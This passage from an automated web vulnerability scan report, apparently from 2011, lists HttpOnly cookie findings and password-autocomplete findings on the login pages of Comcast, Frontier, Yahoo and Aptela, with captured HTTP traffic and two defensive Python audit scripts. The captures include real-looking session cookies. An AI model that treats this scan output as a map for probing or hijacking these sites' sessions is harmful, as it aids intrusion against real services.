Set-Cookie: Conversion=CoUBQ2ptaHZfd2htVG9YWE1LVzBpQUtHcGRTTUQ2RGN2NjhDdVBLbDdEYm1rdlhuQ1FnQUVBTW9BMUNfOExHaF9fX19fXzhCWU1tZV9vYklvX3dhb0FHWXI0WFRBOGdCQWFvRUdrX1FtZXRUVjI5TkxPTXBXOUU3dnl5ZnplVEFmRXdTMWR4NBITCJK07_zGiKsCFRdsgwodjX172xgBIJDejJiwp7rEREgB; expires=Thu, 06-Oct-2011 11:50:37 GMT; path=/pagead/conversion/979457944/
Cache-Control: private
Location: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 06 Sep 2011 11:50:37 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


10.129. http://www.myfitv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: fitvuser. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The _frontiertv_session cookie issued in the same response does set HttpOnly.

Request

GET / HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:45:29 GMT
ETag: "1c6dae7fdca3cc1a86a9e8a293c50cc1"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.123781
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 77353
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...

10.130. http://www.myfitv.com/portal/recent_tv_elastic

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /portal/recent_tv_elastic

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: fitvuser. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/recent_tv_elastic HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:29:50 GMT
ETag: "2698e5fdf58407cf7613e37e2b5b9b8c"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.026102
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 29645
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Yahoo Portal Module</title>

<script src="http://ajax.googleapis.com/ajax
...[SNIP]...

10.131. http://www.myfitv.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search?utf8=%E2%9C%93&query=xss HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:50:36 GMT
ETag: "b06b1c86b03c05bca43a7628c5a0a319"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIiUvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyIPc2Vzc2lvbl9pZCIlNGJlNWEzNzEyYTUxMzU2ZTk3NjdhZGUwZmQ4MGQ1MDg%3D--93112ebe330134a19c07b42f1f52e133e4c4f31d; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.106563
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 30810
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...

10.132. http://www.zillow.com/app

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /app

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app?chartDuration=1year&chartType=partner&cityRegionId=0&countyRegionId=0&height=140&nationRegionId=102001&neighborhoodRegionId=0&page=webservice%2FGetRegionChart&service=chart&showNation=true&stateRegionId=0&width=268&zipRegionId=0 HTTP/1.1
Host: www.zillow.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
X-Internal-Host: 216
X-Requested-Session: D96C22773BC539FD5BC226F64BB0D4A5
Expires: Wed, 07 Sep 2011 10:00:00 GMT
Cache-Control: no-cache
Content-Type: image/gif
Set-Cookie: abtest=1|SearchUnused1%3D94%3AHDPFilmStrip%3D68%3AHDPFinanceModule%3D78%3ABlank%3D73%3AComboLoader%3D36%3ABALSelection%3D8%3ATNCWidgetViewType%3D63%3AMobileBALTest%3D6%3ABALTest%3D83%3AZMMHomepageUpsell%3D85; Domain=.zillow.com; Expires=Mon, 06-Sep-2021 00:45:19 GMT; Path=/
Via: 1.1 www.zillow.com
Vary: User-Agent
Content-Length: 3878

GIF87a....................f.RRR.........................................................................................................................................................................
...[SNIP]...
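The three instances above all come down to reading Set-Cookie headers by hand. The following Python is an added example, not part of the XSS.Cx report or of Burp's checks: it parses Set-Cookie values, reports which attributes are missing (HttpOnly, Secure when the response was served over HTTPS, SameSite), notes a Domain attribute that widens the cookie to every subdomain and a long Expires/Max-Age, and approximates the report's "does not appear to contain a session token" remark with a name/value heuristic. The sample inputs are the Set-Cookie values from the three responses above (the long Rails session value is abbreviated with "..."); the session-name regex and the 32-character opaque-value threshold are assumptions for illustration.

```python
import re

# Constructed sample input: the Set-Cookie values from the three responses above,
# copied from the report (the Rails session value is abbreviated with "...").
SAMPLE_SET_COOKIES = [
    "_frontiertv_session=BAh7ByIOcmV0dXJu...--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; path=/; HttpOnly",
    "fitvuser=fitvuser_etiamsodalesorciat; path=/",
    "abtest=1|SearchUnused1%3D94%3AHDPFilmStrip%3D68; Domain=.zillow.com; "
    "Expires=Mon, 06-Sep-2021 00:45:19 GMT; Path=/",
]

# Assumed heuristic: cookie names that usually carry a session id or auth token.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth|login", re.IGNORECASE)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {lower-cased attribute: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookie(header_value, over_https=False):
    """Return the attribute problems of one Set-Cookie header, in a fixed order.

    over_https says whether the response came over https://; a missing Secure
    attribute is only reportable in that case.
    """
    name, value, attrs = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if over_https and "secure" not in attrs:
        findings.append("missing Secure")
    if "samesite" not in attrs:
        findings.append("missing SameSite")
    if attrs.get("domain"):
        findings.append("Domain=%s widens scope to every subdomain" % attrs["domain"])
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persistent cookie")
    return findings


def looks_like_session_cookie(header_value):
    """Approximation of the report's session-token remark: a session-like name,
    or a value that is one long opaque token (assumed threshold: 32 characters)."""
    name, value, _ = parse_set_cookie(header_value)
    opaque = re.fullmatch(r"[A-Za-z0-9%+/=_.-]{32,}", value) is not None
    return bool(SESSION_NAME_RE.search(name)) or opaque


def audit_response_cookies(header_values, over_https=False):
    """Audit every Set-Cookie value of one response. A session-like cookie that
    lacks HttpOnly is rated Low; everything else stays Information, as in the report."""
    report = []
    for hv in header_values:
        name, _, _ = parse_set_cookie(hv)
        findings = audit_set_cookie(hv, over_https)
        session_exposed = looks_like_session_cookie(hv) and "missing HttpOnly" in findings
        report.append((name, "Low" if session_exposed else "Information", findings))
    return report


if __name__ == "__main__":
    for name, severity, findings in audit_response_cookies(SAMPLE_SET_COOKIES):
        print(name, severity, "; ".join(findings) or "ok")
```

Run over the three sample values, the _frontiertv_session cookie only lacks SameSite, fitvuser lacks HttpOnly and SameSite, and abtest additionally carries a parent-domain scope and a ten-year lifetime; none is rated above Information because none looks like a session token, which matches the report's own wording.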

11. Password field with autocomplete enabled
There are 16 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields). Note that current versions of the major browsers deliberately ignore autocomplete="off" on login and password fields so that their built-in password managers keep working, so the attribute is at best a hint honoured by older browsers and cannot be relied on as a control. In practice the finding is informational; a second authentication factor limits what a captured password is worth, and an empty value (autocomplete="") does not disable the feature at all.
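The fourteen instances that follow were found by one mechanical check: every INPUT of type password whose own autocomplete attribute, or failing that its enclosing FORM's, is not "off". The Python below is an added example, not part of the XSS.Cx report or of Burp, that reproduces the check with the standard library's html.parser. The sample markup is constructed and modelled on the forms quoted in the instances, including the autocomplete="" case seen in the Yahoo instance; the example.com action URLs and field names are illustrative.

```python
from html.parser import HTMLParser

# Constructed sample page modelled on the forms quoted in the instances below:
# a form with no autocomplete attribute, a form with autocomplete="" (an empty
# value does not disable the feature), a form-level "off", and a field-level "off".
# Action URLs and field names are illustrative, not taken from any real site.
SAMPLE_HTML = """
<form name="signin" action="https://login.example.com/login" method="post">
  <input id="passwd" name="passwd" type="password" maxlength="128">
</form>
<form method="post" action="https://login.example.com/config/login?" autocomplete="" name="login_form">
  <input name='passwd' id='passwd' type='password' maxlength='64'>
</form>
<form action="https://secure.example.com/login.htm" method="post" autocomplete="off">
  <input type="password" name="password" id="password" />
</form>
<form action="/webmail/" method="post">
  <input type="password" name="pass" autocomplete="off" />
  <input type="text" name="user" />
</form>
"""


class PasswordAutocompleteAuditor(HTMLParser):
    """Collect password inputs whose effective autocomplete setting is not "off".

    The field's own attribute wins; if the field has none, the enclosing form's
    attribute applies. A missing attribute is recorded as None, an empty one as "".
    """

    def __init__(self):
        super().__init__()
        self.forms = []      # stack of (action, form-level autocomplete) for open forms
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)      # valueless attributes map to None
        if tag == "form":
            self.forms.append((a.get("action") or "", a.get("autocomplete")))
        elif tag == "input" and (a.get("type") or "").strip().lower() == "password":
            action, form_ac = self.forms[-1] if self.forms else ("", None)
            field_ac = a.get("autocomplete")
            effective = field_ac if field_ac is not None else form_ac
            if (effective or "").strip().lower() != "off":
                self.findings.append({
                    "action": action,
                    "field": a.get("name") or a.get("id") or "(unnamed)",
                    "autocomplete": effective,
                })

    def handle_endtag(self, tag):
        if tag == "form" and self.forms:
            self.forms.pop()


def audit_password_autocomplete(html):
    """Return one finding dict per password field that does not have autocomplete off."""
    auditor = PasswordAutocompleteAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for f in audit_password_autocomplete(SAMPLE_HTML):
        print("%s -> %s (autocomplete=%r)" % (f["action"], f["field"], f["autocomplete"]))
```

Only the first two forms are reported: the third disables autocomplete at form level and the fourth at field level. Self-closing inputs are handled because html.parser routes them through handle_starttag, and the attribute names are lower-cased by the parser, so mixed-case markup such as TYPE="Password" is matched as well.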


11.1. https://login.comcast.net/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /login

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: http://xfinity.comcast.net/xpbar/1/default/?referrer=http%3A%2F%2Fsitesearch.comcast.com%2F&highlight=comcastcom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:39 GMT
Server: Apache
Cache-Control: private, max-age=0, no-cache, must-revalidate
Pragma: no-cache
Expires: Mon, 20 Dec 1998 01:00:00 GMT
X-FRAME-OPTIONS: DENY
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>    <title>Sign in to Comcast</title>
   <link rel="stylesheet" type="text/css" href="/static/css/s
...[SNIP]...
<div id="right">
   <form name="signin" action="https://login.comcast.net/login" method="post">
   <div id="signin" >
...[SNIP]...
</label>
       <input id="passwd" name="passwd" type="password" maxlength="128">
       <button type="submit" id="sign_in">
...[SNIP]...

11.2. https://login.frontier.com/webmail/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...
<br />

<form name="login" action="" method="post" target="_parent">
<div id="middle">
...[SNIP]...
<td align="left" style="border: 1px solid #ccc; border-top: none; padding: 6px; color: #666;">
<input type="password" tabindex="2" name="pass" style="direction:ltr; width: 250px;" />
</td>
...[SNIP]...

11.3. https://login.yahoo.com/config/login_verify2

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</legend>


<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="" name="login_form" id="login_form" onsubmit="return hash2(this)">

<input type="hidden" name=".tries" value="1">
...[SNIP]...
</label>
<input name='passwd' id='passwd' type='password' maxlength='64' tabindex='2'>


</div>
...[SNIP]...

11.4. http://www.aptela.com/my-account/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
</h3>
<form action="https://login.aptela.com/cgi/login.cgi" enctype="application/x-www-form-urlencoded" method="post" name="loginform" onsubmit="return submit_login()"><fieldset>
...[SNIP]...
<br /><input name="sessionToken" size="15" type="password" /> </li>
...[SNIP]...

11.5. http://www.aptela.com/my-account/login-error/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
</p>

<form name="loginform" action="https://login.aptela.com/cgi/login.cgi" method="post" enctype="application/x-www-form-urlencoded" tmt:validate="true" onsubmit="return submit_login()">

<fieldset>
...[SNIP]...
<br /><input type="password" name="sessionToken" size="15" tmt:required="true" tmt:message="You must enter a Password." /> </li>
...[SNIP]...

11.6. https://www.frontier.com/AgentOrdering/Login/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /AgentOrdering/Login/ HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
